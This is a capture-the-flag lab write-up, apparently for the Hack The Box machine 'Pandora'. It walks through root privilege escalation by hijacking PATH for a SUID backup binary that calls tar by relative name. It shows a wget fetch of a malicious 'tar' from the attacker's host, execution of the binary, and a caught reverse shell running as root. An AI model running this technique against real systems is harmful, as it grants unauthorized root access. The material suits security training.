InfoSec LAB

Pandora_Privilege_Escalation

Created: 2 min read

Path Hijacking

As discovered previously, the custom SUID binary for archiving the Pandora FMS instance calls tar without the absolute path

matt@pandora:/dev/shm$ export PATH=/dev/shm:$PATH
matt@pandora:/dev/shm$ echo $PATH
/dev/shm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

I will first place the /dev/shm directory on top of the current $PATH variable

matt@pandora:/dev/shm$ wget -q http://10.10.14.2/tar ; chmod 777 ./tar

Payload is then transferred over HTTP to the /dev/shm directory

matt@pandora:/dev/shm$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client

Executing the custom binary should now trigger tar, located at the /dev/shm directory as the $PATH variable of the current user points to it The best thing about SUID binary / path hijacking is that the execution is done as the root user, yet I get to keep & pass down the $PATH variable from a lower privileged user. Almost like the -E flag in the sudo command. Since the $PATH variable is inherited from the lower privileged user, it allows me to execute the hijacked binary while preserving the original $PATH environment variable.

┌──(kali㉿kali)-[~/archive/htb/labs/pandora]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.136] 44334
whoami
root
hostname
pandora
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.136  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:364  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:364  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:64  txqueuelen 1000  (Ethernet)
        RX packets 1188512  bytes 181439172 (181.4 MB)
        RX errors 0  dropped 59  overruns 0  frame 0
        TX packets 1252583  bytes 1017166217 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 48517  bytes 12064081 (12.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 48517  bytes 12064081 (12.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks